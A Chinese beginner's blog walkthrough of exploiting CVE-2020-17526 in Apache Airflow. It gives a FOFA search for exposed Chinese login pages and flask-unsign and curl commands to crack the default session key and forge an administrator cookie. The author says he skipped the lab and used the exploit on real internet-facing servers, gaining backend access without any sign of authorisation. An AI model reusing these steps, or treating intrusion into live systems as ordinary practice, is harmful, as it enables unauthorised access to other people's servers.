实战未授权访问CVE-2020-17526

网上这类文章较少我这里参考资源也不多，本片文章偏向新手一下，所以废话会有一点，见谅。

1. FOFA指纹：

title=="Airflow - Login" && country="CN"

受影响的版本：

Apache Airflow Web < 1.10.14

正文：

这次的实验因为实验环境的问题，迫不得已选择直接拿实战开枪了，同样是vulhub的靶场，大家可以先用靶场开战，我是因为不知明原因启动不起来，靶场的启动目录是/vulhub-master/airflow/CVE-2020-17526

启动命令就不说了，不会的可以上官网看

然后我这里是利用了fofa来查询了一下，网上我看了一下发现，有关这个漏洞的复现很少，基本上搜了下百度只有一两个文章还都是火绒这些大厂写的，我这里通过fofa搜索时也是发现，这个2020年的漏洞真的很多。

废话不多说，先来介绍一下

Apache Airflow 是一个开源的分布式任务调度框架。虽然默认情况下不需要身份验证，但管理员可以指定webserver.authenticate=True启用它。

在 1.10.13 之前的版本中，Apache Airflow 使用默认会话密钥，这会导致在启用身份验证时冒充任意用户。

这里我们不用知道太详细，基本就是一个未授权访问的问题，先找一个目标

马赛克较多哈，懂得都懂，我们随便选择一个，大概后台页面为下面这个样子我们就可以尝试了

我简单看了一下，第一页就好多，证明这个漏洞不怎么受重视，我们直接打开kali来干一波

首先我们需要安装一个软件

pip3 install flask-unsign[wordlist]
pip3 install flask-unsign

后面我们会用到，用于破解会话密钥，然后我们先提取一波cookie

curl -v http://xxxxx:8080/admin/airflow/login

这里我就用xxx代替了，然后我们会获取到一个cookie

我们将cookie复制出来

eyJjc3xxxxxxxVuIjoiY2IzZDVxxxxxxxxNkNjQzNTRjYmY0NWE1YmM4MDNiOWRiMjk5NyJ9.YmFe8Q.sA3ScT329UBJdcAMz5YjGHcUHlQ

中间我替换了一些字符了，然后我们用刚刚安装的软件去解密会话

flask-unsign -u -c [session from Cookie]

这个地方就是解密之后的会话密钥，同样复制下来，我这里就不复制了

随后我们用得到的会话密钥生成一个cookie

flask-unsign -s --secret "你的会话密钥" -c "{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}"

这里意思大致就是获取user为1 的用户的cookie吧

最后一步就是带入进去这个cookie，然后刷新页面

我们成功进入了后台，cookie插入在我下面的箭头位置，这里我用的插件名字是editthiscookie，谷歌的一个插件，大家直接使用应用中的存储中的cookie也可以

简简单单的一次漏洞复现，因为不是靶场，所以后期的一些提权就不需要了，直接提交平台了。如果新手还有哪里看不懂，可以留言提意见，下次会修改。